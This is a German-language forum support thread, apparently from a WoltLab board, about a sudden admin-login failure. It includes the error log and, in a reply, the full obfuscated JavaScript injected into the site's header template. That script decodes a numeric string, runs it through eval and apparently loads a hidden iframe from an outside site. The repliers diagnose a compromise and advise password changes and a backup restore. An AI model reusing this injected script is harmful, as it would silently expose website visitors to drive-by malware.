Login ins ACP nicht mehr möglich - Fatal Error

    Login ins ACP nicht mehr möglich - Fatal Error

    Servus liebe Forengemeinde!

    Wenn man mein Thema als Suchbegriff eingibt, kommen zig Antworten; leider passt keine genau auf mein Problem oder der Lösungsversuch klappt nicht.
    Lange Rede wenig Sinn...

    Was bisher geschah: Nichts!
    Kein neues Update installiert, keine Dateien per FTP gelöscht, kein neues Forum/Benutzergruppe etc. erstellt.

    Von einer zur anderen Sekunde kann ich mich nicht mehr ins ACP einloggen.

    Das einzige, was ich aus der u.a. Meldung herauslesen kann, ist dass was in Line 88 net passt.
    Mit dem WordPad oder Editor werden mir jedoch keine "Lines" angezeigt, so dass ich gar net blick, wo der Fehler zu suchen ist.

    Vlt. hat jemand von euch einen "leichten" Rat.

    Vielen Dank schon mal

    __________________________________________________________________________________________

    You get more information about the problem in our knowledge base: woltlab.com/help/?code=12003
    Information:

    error message: Template compilation failed: unknown tag {location(12);} in template 'header' on line 88
    error code: 12003
    file: /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/TemplateScriptingCompiler.class.php (284)
    php version: 5.2.6
    wcf version: 1.1.7 (Tempest)
    date: Sat, 03 Mar 2012 06:30:57 +0000
    request: /acp/index.php?packageID=48&
    referer: clan-dgs.de/acp/index.php?form=Login&packageID=48&
    Stacktrace:

    #0 /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/TemplateScriptingCompiler.class.php(110): TemplateScriptingCompiler->compileTag('location(12);')
    #1 /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/TemplateCompiler.class.php(31): TemplateScriptingCompiler->compileString('header', '{if $this->sess...')
    #2 /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/Template.class.php(360): TemplateCompiler->compile('header', '{if $this->sess...', '/srv/www/clan-d...')
    #3 /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/Template.class.php(264): Template->compileTemplate('header', '/srv/www/clan-d...', '/srv/www/clan-d...')
    #4 /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/Template.class.php(436): Template->display('header', false)
    #5 /srv/www/clan-dgs.de/public_html/wcf/acp/templates/compiled/48_2_index.php(26): Template->includeTemplate('header', Array, 1)
    #6 /srv/www/clan-dgs.de/public_html/wcf/lib/system/template/Template.class.php(267): include('/srv/www/clan-d...')
    #7 /srv/www/clan-dgs.de/public_html/wcf/lib/page/AbstractPage.class.php(100): Template->display('index')
    #8 /srv/www/clan-dgs.de/public_html/wcf/lib/page/AbstractPage.class.php(46): AbstractPage->show()
    #9 /srv/www/clan-dgs.de/public_html/wcf/lib/util/RequestHandler.class.php(64): AbstractPage->__construct()
    #10 /srv/www/clan-dgs.de/public_html/wcf/lib/util/RequestHandler.class.php(101): RequestHandler->__construct('Index', Array, 'page')
    #11 /srv/www/clan-dgs.de/public_html/acp/index.php(8): RequestHandler::handle(Array)
    #12 {main}
    Im Header hängt tatsächlich der gleiche Code wie gestern bei Sockenschein (siehe hier)

    Source Code

    1. ....</head>
    2. <body id="tplPortal">
    3. <script>if(window.document)try{location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a58.5a58.5a58.5a22a48a47.5a51a54a53.5a54.5a57a51.5a58a49.5a22a49a49.5a22.5a51.5a54a49a49.5a59a22a51a57a53.5a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a58.5a58.5a58.5a22a48a47.5a51a54a53.5a54.5a57a51.5a58a49.5a22a49a49.5a22.5a51.5a54a49a49.5a59a22a51a57a53.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;0>-n.length+i;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}if(1)q=ss;if(f)e(q);</script>
    4. <div id="headerContainer">
    5. ....


    Also: Abschalten, sämtliche Passwörter (FTP, MySql usw.) ändern und Backup zurückspielen....
    Der Kopf ist rund, damit das Denken die Richtung wechseln kann (Francis Picabia)

    Post was edited 1 time, last by “nmichel” ().

    Danke ihr 2. Den von dir, Phoenix77, verlinkten Beitrag habe ich vorhin auch gefunden, hab aber einen Hack auf meiner Seite nicht vermutet.

    Ist es nun für die User ein tatsächliches Sicherheitsproblem?
    Dann würde ich die Seite DIREKT "deinstallieren".

    Oder hat das nur auf meinen Login ins ACP Auswirkungen?

    Source Code

    1. Ist es nun für die User ein tatsächliches Sicherheitsproblem?


    Auch wenn die Konsequenzen nicht direkt absehbar sind: offensichtlich hast du nicht mehr alleine Kontrolle über "deinen" Server - das sollte ausreichen um Maßnahmen zu ergreifen ;)
    Der Kopf ist rund, damit das Denken die Richtung wechseln kann (Francis Picabia)
    Ich denke es ist nicht übertrieben zunächst mal die Passwörter zu ändern und dir mal den Log vom Server anzuschauen. Wenn da was ungewöhnliches ist solltest du den Hoster mal informieren wenn es nicht dein eigener Server ist. Denn dann musst du ja Maßnahmen ergreifen um ihn abzusichern.
    Von mir ist es zunächst mal eine Vermutung ich kenn mich damit nicht wirklich aus also wenn es nicht eilt wart mal Meinungen von den Cracks ab. Nicht das die, die hier schon geschrieben haben vielleicht keine wären :) aber nicht das wir übertreiben. Eben ken Plan.